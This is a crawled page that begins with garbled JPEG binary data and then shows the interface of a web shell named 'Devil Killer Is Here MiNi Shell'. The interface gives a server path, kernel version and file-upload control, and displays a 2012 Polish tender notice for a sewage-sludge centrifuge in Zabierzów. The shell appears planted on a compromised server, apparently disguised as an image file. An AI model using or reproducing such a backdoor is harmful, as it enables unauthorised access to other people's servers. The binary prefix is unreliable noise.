JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/419118-N-2012.html

<p class="kh_header"><b>Zabierzów: Dostawa i instalacja nowej wirówki osadów wraz z innymi urządzeniami do stacji odwadniania osadów w Oczyszczalni Ścieków w Balicach.</b><br>
<b>Numer ogłoszenia: 419118 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Usług Komunalnych Sp. z o.o. w Zabierzowie , ul. Kolejowa 28, 32-080 Zabierzów, woj. małopolskie, tel. 012 2853671, faks 012 2853670.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabierzow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i instalacja nowej wirówki osadów wraz z innymi urządzeniami do stacji odwadniania osadów w Oczyszczalni Ścieków w Balicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa i instalacja nowej wirówki osadów wraz z innymi urządzeniami do stacji odwadniania osadów w Oczyszczalni Ścieków w Balicach.

WYMAGANIA MECHANICZNE:
Wirówka:
1.	Wirówka dekantacyjna
-	maksymalna wydajność wirówki: nie mniejsza niż 2,5m3/h i nie większa niż 6m3/h
-	wydajność masowa min 50kg s.m./h (przy zawartości s.m. 2%)
2.	Obudowa w części górnej z pokrywą 
3.	Obudowa w części dolnej z wylotami dla cząstek stałych i odcieku wykonanych ze stali nierdzewnej
4.	Zespoły wirujące dekantera zamontowane na ramie 
5.	Rama wirówki wyposażona w elastyczne separatory wibracji 
6.	Zespoły wirujące na ich końcach wsparte na łożyskach
7.	Bęben i ślimak napędzane silnikami elektrycznymi
8.	Wszystkie części mające styczność z medium powinny być wykonane ze stali      kwasoodpornej CrNiMo
9.	Elementy usytuowane na wlocie i wylocie oraz strefy ulegającej przyspieszonemu zużyciu powinny być wykonane z materiału o podwyższonej odporności na ścieranie, wymienialne na miejscu
10.	Praca wirówki w trybie automatycznym
11.	Możliwość regulacji zadanych parametrów:
-	prędkości obrotowej bębna,
-	prędkości obrotowej ślimaka,
-	poziomu napełnienia bębna,
-	wydajności napływu osadu,
-	wydajności pompy elektrolitu;
12.	Poziom emisji hałasu nie może przekraczać 85dB

WYMAGANIA DLA CZĘŚCI ELEKTRYCZNEJ
Szafa sterowania:
1.	Sterowanie pracą stacji odwadniania osadu sterownikiem PLC
2.	Panel operatorski z graficzną wizualizacją (opisy w języku polskim)
3.	Sterowanie pracą napędu w zależności od obciążenia bębna masą osadu 
4.	Wyłącznik bezpieczeństwa w drzwiach wejściowych
5.	Odczyty na panelu operatorskim:
-	prędkość obrotowa bębna,
-	prędkość obrotowa ślimaka,
-	poziom napełnienia bębna,
-	wydajność napływu osadu,
-	wydajność pompy polielektrolitu
6.	Silniki - rozruch i regulacja  poprzez przetwornik częstotliwości
7.	System automatyki wirówki musi być oparty o swobodnie programowalny sterownik 	
PLC  z panelem operatorskim.
8.	Panel operatorski wirówki powinien zawierać grafikę, wykresy bieżące i historyczne, 	
tabele i zestawienia (raporty), wszystkie opisy i komentarze w języku polskim
9.	Silnik pompy osadu i pompy polielektrolitu wyposażone w przemiennik 	częstotliwości
10.	Wykonawca jest zobowiązany do wykonania i przekazania projektów powykonawczych oraz wszelkich innych opracowań wymagających formy pisemnej i graficznej w formie analogowej (papierowej) i cyfrowej (na nośniku CD-R) w języku polskim.
11.	Wykonawca przekaże oprogramowanie sterowników PLC oraz paneli operatorskich w wersji źródłowej wraz z narzędziami użytymi do programowania i interfejsami (kablami) oraz nastawy falowników i innych urządzeń wymagających parametryzacji wraz z wszystkimi hasłami i zabezpieczeniami
12.	Do wymaganych prawem klauzul i oświadczeń wykonawca dołączy wszelkie opracowania projektowe i towarzyszące w 4 egzemplarzach analogowych (papierowych) i w formie cyfrowej (na nośniku CD-R - projekty w formacie DWG i DOC oprogramowanie w wersji źródłowej wraz z hasłami i licencjami).
WYMAGANIA TECHNOLOGICZNE:
Parametry osadu do odwodnienia:
-	Osad ustabilizowany 
-	Zawartość suchej masy: 1,5 - 2% s.m.
-	Zawartość suchej masy organicznej: max 62% s.m.o - śr. 68% s.m.o.

Parametry osadu po odwodnieniu:
-	Stopień odwodnienia po wirówce nie mniejszy niż 23 % s. m.
-	Stopień odzysku filtratu 1000 mg/l
-	Zużycie polimeru - emulsja: max 12 kg (substancji aktywnej)/Mg s. m.
-	Zużycie polimeru - proszek: max 9 kg/Mg s. m.

WYMAGANIA OGÓLNE:
-	Przedmiot zamówienia zostanie dostarczony (na koszt wykonawcy) do Oczyszczalni 	Ścieków w Balicach.
-	Wykonawca powinien zapoznać się z istniejącą dokumentacją powykonawczą oraz odbyć 	wizję lokalną w pomieszczeniu prasy i na tej podstawie tak dobrać urządzenie, aby cała linia 	odwadniania pracowała poprawnie.
-	Wykonawca dostarczy stosowną branżową dokumentację projektową - projekt adaptacyjny 	do Oczyszczalni Ścieków w Balicach; Kierownik Eksploatacji (lub osoba upoważniona) w 	terminie do 7 dni może zgłosić do projektu uwagi, które wykonawca ma obowiązek 	uwzględnić.
-	Do oferty należy załączyć wstępny harmonogram rzeczowo-finansowy prac związanych 	z wykonaniem zamówienia obejmujący przybliżone terminy, w których zostaną wykonane 
-	projekt adaptacyjny,
-	dostawa urządzeń,
-	montaż urządzeń,
-	rozruch,
-	szkolenie pracowników zamawiającego,
-	próba końcowa.

-	Wykonawca dostarczy w ciągu 30 dni od podpisania umowy projekt fundamentu pod 	wirówkę  oraz przedstawi oświadczenie projektanta że istniejący strop 	przejmie obciążenie i drgania od urządzenia. Zamawiający we własnym zakresie wykona 	fundament na podstawie otrzymanego projektu.
-	W ofercie należy podać pełny opis budowy, działania wirówki oraz wszystkie parametry 	techniczne (karta katalogowa).
-	Czas pracy wirówki w ciągu doby  do 12 h.
-	Czas pracy wirówki w ciągu tygodnia 7 d.
-	Wykonawca przeanalizuje możliwość wykorzystania miejsca w szafach zasilających 	i sterowniczych po prasie Pomiltek. Jeżeli warunki techniczne nie zezwolą, należy 	uwzględnić stosowne zmiany. 
-	Wykonawca dokona weryfikacji możliwości zastosowania urządzeń istniejącej linii 	odwadniania osadu (przenośnik ślimakowy, stacja polielektrolitu, pompa osadu, stacja 	wapnowania). Jeżeli Wykonawca  uzna, że któryś z istniejących elementów linii  
odwadniania może powodować niedotrzymanie wymagań zamawiającego co do ilości               lub jakości osadu odwodnionego, wówczas należy ująć w ofercie (i w cenie ofertowej) również te urządzenia. W takim przypadku nowe urządzenia powinny mieć następujące własności:
1.	Pompa osadu: śrubowa lub ślimakowa z regulowaną wydajnością za pomocą przemiennika częstotliwości, części mające styk z medium wykonane ze stali kwasoodpornej.
2.	Stacja polielektorlitu przystosowana do polimeru w fazie płynnej i stałej. 
-	Wykonawca ma obowiązek bardzo szczegółowo sprawdzić na obiekcie warunki wykonania 	przedmiotowych prac oraz uzyskać na swoją odpowiedzialność i ryzyko wszelkie 	informacje, które mogą być konieczne do przygotowania oferty obejmującej wszystkie 	elementy niezbędne do zrealizowania przedmiotu zamówienia w sposób umożliwiający jego 	prawidłową eksploatację zgodnie z przeznaczeniem. 
-	Wykonawca dokona montażu, podłączenia do instalacji, rozruchu technologicznego całej 	linii odwadniania, oraz przeszkoli obsługę. 
-	Wykonawca przeprowadzi test odbiorowy przy wydajności od 75% do 100% wydajności 	maksymalnej wirówki na swoim polimerze w trakcie 24 h pracy urządzenia (łącznie w ciągu 	3 dni).
-	W trakcie testu będą pobrane losowo co najmniej 4 próby, z których 
	w akredytowanym laboratorium określone zostaną parametry:
-	osadu surowego,
-	osadu odwodnionego,
-	odcieku,
-	ilości polimeru.
-	W przypadku niedotrzymania parametrów gwarancyjnych przez wykonawcę strony umówią 	się co do terminu następnego testu odbiorowego. Minimalny czas pomiędzy testami, 	zamawiający wyznacza na 7 dni. Test nie może być przeprowadzony w dni ustawowo wolne 	od pracy oraz niedziele i święta.
Do odbioru końcowego urządzeń wymagane są następujące dokumenty:
1.	Karta Gwarancyjna.
2.	Dokumentacja Techniczno-Ruchowa wirówki i zamontowanych urządzeń (dwa egzemplarze w języku polskim), która powinna zawierać:
-	spis treści i numeracje stron,
-	szczegółowy opis działania,
-	wszystkie rysunki zestawieniowe poszczególnych podzespołów wraz z oznakowaniem i nazwą każdej części,
-	schematy elektryczne wraz z wyspecyfikowanymi elementami,
-	zestawienie tabelaryczne zakłóceń w pracy wraz ze sposobem ich usunięcia,
-	wykaz części szybko zużywających się,
-	kopie kart gwarancyjnych zabudowanych urządzeń.
3.	Instrukcje obsługi w języku polskim.
4.	Oświadczenie o zgodności z przepisami Unii Europejskiej.
5.	Protokół z pomiarów elektrycznych.
6.	Protokół odbioru końcowego wykonany przez dział kontroli jakości producenta wraz z wynikami pomiarów prób ruchowych i natężenia hałasu.
7.	Dokładny harmonogram przeglądów i czynności serwisowych.
2.	Inne informacje:
-	Odbiór końcowy uważa się za dokonany po obustronnym podpisaniu protokołu końcowego 	nie zawierającego uwag.
-	Producent w swojej firmie na koszt własny przeszkoli dwóch pracowników PUK Sp. z o.o. 	w zakresie umożliwiającym dokonywanie samodzielnie bieżącej konserwacji oraz wymiany 
             części szybko zużywających się dostarczonego urządzenia 	po upływie gwarancji.
- W ofercie należy podać oferowany -nie krótszy niż 24 miesiące  - okres udzielanej 	gwarancji na przedmiot zamówienia liczony od dnia podpisania protokołu końcowego 	odbioru przedmiotu zamówienia. W przypadku różnych okresów gwarancji na poszczególne 	elementy zamówienia do oceny spełnienia ww. warunku oraz do porównania ofert zostanie 	przyjęty najkrótszy z oferowanych okresów. Wymagana jest gwarancja wystawiona przez 	producenta urządzenia na Zamawiającego. Wykonawca zobowiązany jest w okresie 	udzielanej gwarancji przeprowadzać określone dokumentacją gwarancyjno-eksploatacyjną 	przeglądy i konserwacje przedmiotowych urządzeń w siedzibie zamawiającego, a przed 	zakończeniem okresu gwarancji - wykonać generalny przegląd urządzenia. 
-	Wykonawca zapewni przyjazd serwisu w ciągu dwóch dni od zgłoszenia.
-	Producent zapewni dostawę części zamiennych dostarczonego urządzenia, odpłatnie po 	upływie udzielonej gwarancji.
-	Ofertę należy opracować na podstawie niniejszej specyfikacji.
ZMIANY  W  SPECYFIKACJI  ISTOTNYCH  WARUNKÓW  ZAMÓWIENIA
-	W uzasadnionych przypadkach zamawiający może przed upływem terminu składania ofert zmienić treść specyfikacji istotnych warunków zamówienia. Dokonana zmiana zostanie zamieszczona na stronie internetowej, na której umieszczona jest specyfikacja.
-	Jeżeli w wyniku zmiany treści specyfikacji jest niezbędny dodatkowy czas na wprowadzenie zmian w ofertach, zamawiający przedłuży termin składania ofert i poinformuje o tym na stronie internetowej. W takim przypadku wszystkie prawa i obowiązki zamawiającego oraz wykonawców dotyczące terminu pierwotnego będą się odnosić do terminu zmienionego.
-	Każda zmiana staje się wiążąca z momentem jej wprowadzenia i zamieszczenia na stronie internetowej.
WIZJA  LOKALNA
1.	Przed złożeniem oferty wykonawca zobowiązany jest zapoznać się z miejscem realizacji zamówienia i od kierownika obiektu lub osoby upoważnionej uzyskać potwierdzenie odbycia wizji lokalnej.
2.	Koszt wizji lokalnej ponosi wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.22.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy niepodlegający wykluczeniu na podstawie art. 24  ust. 1 i 2 ustawy Pzp oraz spełniający warunki o których mowa w art. 22 ust. 1 ustawy Pzp i określone w pkt. 3.

 Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w ust. III na zasadzie spełnia / nie spełnia. 

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:

Posiadania uprawnień do wykonania określonej działalności lub czynności, jeśli przepisy prawa nakładają obowiązek ich posiadania- na podstawie oświadczenia zał. nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia;
Warunek wiedzy i doświadczenia oceniany zostanie na podstawie wykazu wykonywanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych nadal, dostaw w zakresie niezbędnym do wykazania spełnienia warunków wiedzy i doświadczenia w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wykonanych (wykonywanych) w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców; dla celów niniejszego zamówienia wykaz ten musi obejmować dostawy urządzeń odwadniających, których koszt wykonania wynosił nie mniej niż 300 000 zł. łącznie, przy czym brak w Załączniku nr 3 wykonywanych dostaw o powyższych cechach będzie równoznaczny z brakiem wymaganego doświadczenia;
Dokumenty potwierdzające, że dostawy wykazywane  przez wykonawcę w Załączniku nr 3 zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny.
Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca złoży oświadczenie o spełnianiu  warunków określonych w art. 22 ust. 1 uPzp - załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia.
Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca złoży oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 uPzp - załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa.
Wykonawca winien posiadać polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.1 Formularz oferty - załącznik nr 1.
4.2 Oświadczenie o przeprowadzeniu wizji lokalnej -zał. nr 6 potwierdzone przez kierownika obiektu lub osobę upoważnioną;
4.3 Pełnomocnictwo do reprezentowania Wykonawcy w przypadku podpisywania oferty i pozostałych dokumentów przez pełnomocnika.
